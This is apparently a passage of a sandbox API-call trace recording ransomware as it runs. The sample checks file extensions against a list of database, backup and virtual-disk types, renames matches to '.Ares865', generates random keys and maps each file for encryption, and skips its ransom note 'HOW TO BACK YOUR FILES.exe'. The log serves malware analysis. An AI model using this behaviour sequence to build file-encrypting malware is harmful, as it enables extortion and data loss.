(lpString1="VISINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0088.425] lstrlenW (lpString=".lnk") returned 4 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0088.425] lstrlenW (lpString=".ini") returned 4 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0088.425] lstrlenW (lpString=".sys") returned 4 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0088.425] lstrlenW (lpString="VISINTL.DLL.trx_dll") returned 19 [0088.425] lstrlenW (lpString="bak") returned 3 [0088.425] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.425] lstrlenW (lpString="ba_") returned 3 [0088.425] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.425] lstrlenW (lpString="dbb") returned 3 [0088.425] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.425] lstrlenW (lpString="vmdk") returned 4 [0088.425] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.425] lstrlenW (lpString="rar") returned 3 [0088.425] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.425] lstrlenW (lpString="zip") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.426] lstrlenW (lpString="tgz") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.426] lstrlenW (lpString="vbox") returned 4 [0088.426] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.426] lstrlenW (lpString="vdi") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.426] lstrlenW (lpString="vhd") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.426] lstrlenW (lpString="vhdx") returned 4 [0088.426] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.426] lstrlenW (lpString="avhd") returned 4 [0088.426] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.426] lstrlenW (lpString="db") returned 2 [0088.426] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.426] lstrlenW (lpString="db2") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.426] lstrlenW (lpString="db3") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.426] lstrlenW (lpString="dbf") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.426] lstrlenW (lpString="mdf") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.426] lstrlenW (lpString="mdb") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.426] lstrlenW (lpString="sql") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.426] lstrlenW (lpString="sqlite") returned 6 [0088.426] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.426] lstrlenW (lpString="sqlite3") returned 7 [0088.426] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.426] lstrlenW (lpString="sqlitedb") returned 8 [0088.426] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.426] lstrlenW (lpString="xml") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.426] lstrlenW (lpString="$er") returned 3 [0088.426] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.426] lstrlenW (lpString="4dd") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.427] lstrlenW (lpString="4dl") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.427] lstrlenW (lpString="^^^") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.427] lstrlenW (lpString="abs") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.427] lstrlenW (lpString="abx") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.427] lstrlenW (lpString="accdb") returned 5 [0088.427] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.427] lstrlenW (lpString="accdc") returned 5 [0088.427] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.427] lstrlenW (lpString="accde") returned 5 [0088.427] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.427] lstrlenW (lpString="accdr") returned 5 [0088.427] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.427] lstrlenW (lpString="accdt") returned 5 [0088.427] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.427] lstrlenW (lpString="accdw") returned 5 [0088.427] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.427] lstrlenW (lpString="accft") returned 5 [0088.427] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.427] lstrlenW (lpString="adb") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.427] lstrlenW (lpString="adb") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.427] lstrlenW (lpString="ade") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.427] lstrlenW (lpString="adf") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.427] lstrlenW (lpString="adn") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.427] lstrlenW (lpString="adp") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.427] lstrlenW (lpString="alf") returned 3 [0088.427] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.427] lstrlenW (lpString="ask") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.428] lstrlenW (lpString="btr") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.428] lstrlenW (lpString="cat") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.428] lstrlenW (lpString="cdb") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.428] lstrlenW (lpString="ckp") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.428] lstrlenW (lpString="cma") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.428] lstrlenW (lpString="cpd") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.428] lstrlenW (lpString="dacpac") returned 6 [0088.428] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.428] lstrlenW (lpString="dad") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.428] lstrlenW (lpString="dadiagrams") returned 10 [0088.428] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0088.428] lstrlenW (lpString="daschema") returned 8 [0088.428] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.428] lstrlenW (lpString="db-journal") returned 10 [0088.428] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0088.428] lstrlenW (lpString="db-shm") returned 6 [0088.428] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.428] lstrlenW (lpString="db-wal") returned 6 [0088.428] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.428] lstrlenW (lpString="dbc") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.428] lstrlenW (lpString="dbs") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.428] lstrlenW (lpString="dbt") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.428] lstrlenW (lpString="dbv") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.428] lstrlenW (lpString="dbx") returned 3 [0088.428] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.428] lstrlenW (lpString="dcb") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.429] lstrlenW (lpString="dct") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.429] lstrlenW (lpString="dcx") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.429] lstrlenW (lpString="ddl") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.429] lstrlenW (lpString="dlis") returned 4 [0088.429] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.429] lstrlenW (lpString="dp1") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.429] lstrlenW (lpString="dqy") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.429] lstrlenW (lpString="dsk") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.429] lstrlenW (lpString="dsn") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.429] lstrlenW (lpString="dtsx") returned 4 [0088.429] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.429] lstrlenW (lpString="dxl") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.429] lstrlenW (lpString="eco") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.429] lstrlenW (lpString="ecx") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.429] lstrlenW (lpString="edb") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.429] lstrlenW (lpString="epim") returned 4 [0088.429] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.429] lstrlenW (lpString="fcd") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.429] lstrlenW (lpString="fdb") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.429] lstrlenW (lpString="fic") returned 3 [0088.429] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.429] lstrlenW (lpString="flexolibrary") returned 12 [0088.429] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0088.429] lstrlenW (lpString="fm5") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.430] lstrlenW (lpString="fmp") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.430] lstrlenW (lpString="fmp12") returned 5 [0088.430] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.430] lstrlenW (lpString="fmpsl") returned 5 [0088.430] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.430] lstrlenW (lpString="fol") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.430] lstrlenW (lpString="fp3") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.430] lstrlenW (lpString="fp4") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.430] lstrlenW (lpString="fp5") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.430] lstrlenW (lpString="fp7") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.430] lstrlenW (lpString="fpt") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.430] lstrlenW (lpString="frm") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.430] lstrlenW (lpString="gdb") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.430] lstrlenW (lpString="gdb") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.430] lstrlenW (lpString="grdb") returned 4 [0088.430] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.430] lstrlenW (lpString="gwi") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.430] lstrlenW (lpString="hdb") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.430] lstrlenW (lpString="his") returned 3 [0088.430] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.430] lstrlenW (lpString="ib") returned 2 [0088.431] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.431] lstrlenW (lpString="idb") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.431] lstrlenW (lpString="ihx") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.431] lstrlenW (lpString="itdb") returned 4 [0088.431] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.431] lstrlenW (lpString="itw") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.431] lstrlenW (lpString="jet") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.431] lstrlenW (lpString="jtx") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.431] lstrlenW (lpString="kdb") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.431] lstrlenW (lpString="kexi") returned 4 [0088.431] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.431] lstrlenW (lpString="kexic") returned 5 [0088.431] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.431] lstrlenW (lpString="kexis") returned 5 [0088.431] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.431] lstrlenW (lpString="lgc") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.431] lstrlenW (lpString="lwx") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.431] lstrlenW (lpString="maf") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.431] lstrlenW (lpString="maq") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.431] lstrlenW (lpString="mar") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.431] lstrlenW (lpString="marshal") returned 7 [0088.431] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.431] lstrlenW (lpString="mas") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.431] lstrlenW (lpString="mav") returned 3 [0088.431] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.431] lstrlenW (lpString="maw") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.432] lstrlenW (lpString="mdbhtml") returned 7 [0088.432] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.432] lstrlenW (lpString="mdn") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.432] lstrlenW (lpString="mdt") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.432] lstrlenW (lpString="mfd") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.432] lstrlenW (lpString="mpd") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.432] lstrlenW (lpString="mrg") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.432] lstrlenW (lpString="mud") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.432] lstrlenW (lpString="mwb") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.432] lstrlenW (lpString="myd") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.432] lstrlenW (lpString="ndf") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.432] lstrlenW (lpString="nnt") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.432] lstrlenW (lpString="nrmlib") returned 6 [0088.432] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.432] lstrlenW (lpString="ns2") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.432] lstrlenW (lpString="ns3") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.432] lstrlenW (lpString="ns4") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.432] lstrlenW (lpString="nsf") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.432] lstrlenW (lpString="nv") returned 2 [0088.432] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.432] lstrlenW (lpString="nv2") returned 3 [0088.432] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.432] lstrlenW (lpString="nwdb") returned 4 [0088.433] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.433] lstrlenW (lpString="nyf") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.433] lstrlenW (lpString="odb") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.433] lstrlenW (lpString="odb") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.433] lstrlenW (lpString="oqy") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.433] lstrlenW (lpString="ora") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.433] lstrlenW (lpString="orx") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.433] lstrlenW (lpString="owc") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.433] lstrlenW (lpString="p96") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.433] lstrlenW (lpString="p97") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.433] lstrlenW (lpString="pan") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.433] lstrlenW (lpString="pdb") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.433] lstrlenW (lpString="pdm") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.433] lstrlenW (lpString="pnz") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.433] lstrlenW (lpString="qry") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.433] lstrlenW (lpString="qvd") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.433] lstrlenW (lpString="rbf") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.433] lstrlenW (lpString="rctd") returned 4 [0088.433] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.433] lstrlenW (lpString="rod") returned 3 [0088.433] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.433] lstrlenW (lpString="rodx") returned 4 [0088.434] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.434] lstrlenW (lpString="rpd") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.434] lstrlenW (lpString="rsd") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.434] lstrlenW (lpString="sas7bdat") returned 8 [0088.434] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.434] lstrlenW (lpString="sbf") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.434] lstrlenW (lpString="scx") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.434] lstrlenW (lpString="sdb") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.434] lstrlenW (lpString="sdc") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.434] lstrlenW (lpString="sdf") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.434] lstrlenW (lpString="sis") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.434] lstrlenW (lpString="spq") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.434] lstrlenW (lpString="te") returned 2 [0088.434] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.434] lstrlenW (lpString="teacher") returned 7 [0088.434] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.434] lstrlenW (lpString="tmd") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.434] lstrlenW (lpString="tps") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.434] lstrlenW (lpString="trc") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.434] lstrlenW (lpString="trc") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.434] lstrlenW (lpString="trm") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.434] lstrlenW (lpString="udb") returned 3 [0088.434] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.434] lstrlenW (lpString="udl") returned 3 [0088.435] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.435] lstrlenW (lpString="usr") returned 3 [0088.435] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.435] lstrlenW (lpString="v12") returned 3 [0088.435] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.435] lstrlenW (lpString="vis") returned 3 [0088.435] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.435] lstrlenW (lpString="vpd") returned 3 [0088.435] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.435] lstrlenW (lpString="vvv") returned 3 [0088.435] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.435] lstrlenW (lpString="wdb") returned 3 [0088.435] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.435] lstrlenW (lpString="wmdb") returned 4 [0088.435] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.435] lstrlenW (lpString="wrk") returned 3 [0088.435] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.435] lstrlenW (lpString="xdb") returned 3 [0088.435] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.435] lstrlenW (lpString="xld") returned 3 [0088.435] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.435] lstrlenW (lpString="xmlff") returned 5 [0088.435] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.435] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.Ares865") returned 79 [0088.435] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.436] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.436] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=488800) returned 1 [0088.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.437] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.437] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.437] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.438] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x77860, lpName=0x0) returned 0x15c [0088.439] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x77860) returned 0x420000 [0088.509] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.510] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.510] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0088.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0088.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.510] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0088.515] CloseHandle (hObject=0x15c) returned 1 [0088.515] CloseHandle (hObject=0x118) returned 1 [0088.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.517] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb31c100, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0ca650, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcb31c100, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x25b60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WWINTL.DLL.trx_dll", cAlternateFileName="WWINTL~1.TRX")) returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".") returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="..") returned 1 